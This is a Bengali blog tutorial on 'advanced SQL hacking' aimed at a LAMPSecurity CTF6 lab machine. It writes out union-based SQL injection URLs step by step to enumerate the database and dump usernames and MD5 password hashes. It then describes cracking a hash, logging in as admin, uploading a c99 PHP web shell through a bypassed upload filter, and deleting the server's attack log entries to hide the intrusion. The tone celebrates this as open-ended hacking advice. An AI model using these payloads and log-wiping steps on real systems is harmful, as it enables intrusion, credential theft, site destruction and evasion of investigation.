!i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

আসসালামু আলাইকুম, সবাইকে আজকের টিউনে স্বাগতম কেমন আছেন সবাই? আশা করি সবাই ভাল আছেন আজ আপনাদের সামনে হাজির হয়েছি আরেকটি হ্যাকিংয়ের টিউন নিয়ে আমি হ্যাকিং পারি না তবুও একটু আধটু আপনাদের সাথে দেখি পারি কিনা শেয়ার করতে আজকের টিউনের নাম, “এডভান্সড SQL হ্যাকিং টিউটোরিয়াল”

আগেই বলে নিই যে, আমি এটি হ্যাকিং করি নি এই টিউটোরিয়ালটির Credits—-> Coded32, Mantra Security, LAMP Security, C99 shell Creator, Abhi_M, Limerick, Evil, Srchasst, BrandonMXB, DSG – Dragon Slayer Guy, N3t

!i!i!i!iএডভান্সড SQL হ্যাকিং টিউটোরিয়াল!i!i!i!i

হ্যাকিং শুরু করার আগে আপনাকে কয়েকটা জিনিস আগেই নিতে হবে —–>

Mantra Security Toolkit=

লিনাক্সের জন্য ডাউনলোড লিংক (৩২ বিট) অথবা ডাউনলোড লিংক (৬৪ বিট)

উইন্ডোজের জন্য ডাউনলোড লিংক

এ্যাপলের জন্য ডাউনলোড লিংক

একটি vulnerable ওয়েব সাই্ট। আমি একটি মডিফাই ভার্সন ব্যবহার করেছি, সেটা হল LAMPSecurity CTF6

যে কোন PHP Shell যেটা আপনি পচন্দ করেন। যেমন- Google for “c99 shell” আমার মতে Team Nuts এর Devil shell এটাই ঠিক।

এবার কাজ শুরু হবে

আপনি আপনাদের একটি ওয়েব সাইট দিলাম। আপনারা যদি পান, তাহলে তো ভাল কখা।

http//192.168.132.128/

আমি ওয়েবসাইটটির প্রত্যেকটি পাতায় গেলাম ও নিচের URL টি দেয়ার সাথে সাথে একটা পৃষ্ঠা পেয়ে গেলাম।

http//192.168.132.128/?id=13

এবার F9 চেপে হ্যাকিংয়ের বারটি চালু করুন।

এবার আমি ওয়েব সাইটটির vulnerable পরীক্ষা করতে লাগলাম।

এবার লিংকটি সবার শেষে একটি ( ‘ ) দিলাম। যেমন-

http//192.168.132.128/?id=13’

এবার যেহেতু নতুন পাতাটি আগের পৃষ্ঠা থেকে ভিন্ন, তাই্ আমি নিশ্চিত হয়ে গেলাম যে এটা একটি vulnerable ওয়েবসাইট।

তাহলে এবার আপনি এখন বুঝেগেছে যে একটি vulnerable ওয়েবসাইট কেমন হতে পারে।

এবার নিচের লিংকটি লিখে এন্টার করুন।

http//192.168.132.128/?id=13 order by 1

আপনাকে শেষের সংখ্যাটি মনে রাখতে হবে। যাতে আপনি পরবর্তীতে পৃষ্ঠা পরিবর্তন করতে পারেন।

এবার এড্রেস বারে নিচের কোডটি টাইপ করে এন্টার করুন।

http//192.168.132.128/?id=13 order by 7

কোন পরিবর্তন ছাড়াই্ আমি ৭ এর চলে গেছি।

http//192.168.132.128/?id=13 order by 7

এবার আমরা Injection এর মাধ্যমে ৮ এ পরিবর্তন করবো। তাই্ আমরা ওয়েব সার্ভার হ্যাক করার পথ এখন খুঁজব। P

http//192.168.132.128/?id=13 order by 8

এবার সামনের দিকে এগিয়ে চলুন ও UNION statement তৈরি করুন। আমি শুধু SQL > UNION SELECT STATEMENT এখানে গিয়েছি।

এবার আমি টেবিলের সংখ্যা দিলাম। যেহেতু আমি ৮ পৃষ্ঠায় একটি ভিন্ন একটি পৃষ্ঠা পেয়েছিলাম, আমি নিশ্চিত যে, ৮ টাতে টেবিল ঠিক মতো নেই এবং সেখানে মাত্র ৭টি টেবিল আছে।

বাহ! আমি কিছু নাম্বার পেয়ে গেছি এই পাতায়। যেগুলো vulnerable columns. এখান থেকে ২ নিন।

http//192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

এবার আমি নাম্বার ২ দিলাম লিংকটিতে ও আরেকটি SQL কমান্ড দিলাম। আমি এটা কার্যকর পেয়েছিলাম এবং এই পৃষ্ঠার ফলাফলও পেয়েছিলাম।

http//192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

এটার বর্তমা ইউজার হল cms_user@localhost

এবার আমরা এর database ভার্সন খুঁজে বের করব। এবার আমি ২ এর জায়গায় version() ব্যবহার করলাম।

http//192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

এর ডাটাবেজ ভার্সন পেলাম 5.0.45

এবার আমার টেবিল তালিকা দেখুন।

http//192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

আমি এই তালিকা থেকে “user” নামে একটি মজার টেবিল পেলাম। এবার আমি সকল কলামের তালিকা করলাম।

http//192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

আমি “user” টেবিল থেকে কলাম চেয়েছিলাম কিন্তু দেখি কিছুই নাই।

http//192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=’user’

এবার ইউজার নেম খুঁজে বের করব।

http//192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

এবার পাসওয়ার্ড কি?

http//192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

এটা দেখি এনক্রিপ্ট করা, এবার পাসওয়ার্ডকে Decrypting করলাম।

এবার আমি MD5 hash টি কপি করলাম। এবার হ্যাসটিকে hackbar এ পেষ্ট করলাম।

এবার এখানে গেলাম Encryption > MD5 Menu > send to > md5.rednoize.com

ওহো!!! আমি পাসওয়ার্ড পেয়ে গেলাম।

এবার লগইন পেজ খুঁজে বের করুন।

এটা আমার সামনেই আছে ঠিক, কিন্তু এটা আমার অন্যন্যা ক্ষেত্রেও আপনাকে এটা খুঁজে বের করতে হবে।

সবকিছু এখন ব্যাখ্যা দেয়া সম্ভব নয়, আপনি ভাল ভাবে একটু গবেষণা করুন যে, কিভাবে হ্যাকারা কাজ করে ও অনুসন্ধান করে।

আপনি একটু আগে যেটা পেয়েছেন, সেটা দিয়ে লগইন করুন।

সাবাস!!!!!! লগইন করে পেলেছে, আপনি এখন এই সাইটের এডমিন। হু হু হু হু হু হা হা হা হা হা হি হি হি হি হি

এবার আমি একটি আপলোড করে দিলাম।

এবার দেখুন এটি আপনাকে কোন শেল আপলোড করতে দেবে না।

এবার আমরা একটি “Add Event” বাটন যোগ করব।

সুন্দর!!! এটি আপলোড করতে দিচ্ছে।

আসুন যেখানে শেল আপলোড পেয়েছিলাম দেখুন

এখন আমরা ডিফল্ট আপলোড স্থান পেতে চেষ্টা করব।

 

এবার আমি দেখেন পেরেছি। এবার c9shell.php ফাইলটিতে ক্লিক করুন, যেটা আমি একটু আগে আপলোড করে ছিলাম।

বাহ আমি shell এ প্রবেশ করতে পেরেছি।

এবার আমি সবচেয়ে উপরের বাটনে ক্লিক করছি, যাতে root folder টি পেতে পারি।

এবার আপনি আপনার ইচ্ছা মতো যা ইচ্ছা তাই করতে পারবেন। আপনি ইচ্ছা করলে পুরা ওয়েবসাইটটি মুছে ফেলতে বা কোডিং পরিবর্তন বা যা ইচ্ছা তাই করতে পারবেন।

এবার log folder >>>log.log ক্লিক করুন ও এটা হল আমার SQL injection attacks এর মূল লগ ফাইল।

এবার এটিতে যান ও লগ ফাইলটি এডিট করুন।

 

এবার আমি আমার পুরা লগ এন্টিগুলো ডিলিট করে দিই। এবার এটি সেভ করুন। বাহ! লগ ফাইলটি খালি হু হু হু হু হা হা হা হা হি হি হি হি

এবার Self Remove এ ক্লিক করে c99 shell টি মুছে ফেলুন। সাবাস!!

Good Bye C99

আমি আপনাদের আগেই বলেছি যে, আমি হ্যাকার না। তবুও আপনাদের কিছু শিখানোর জন্য মাঝে মাঝে হ্যাকিংয়ের উপর টিউটোরিয়াল লিখতে চেষ্টা করি। হয় না, তবুও চেষ্টা আর কি P সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………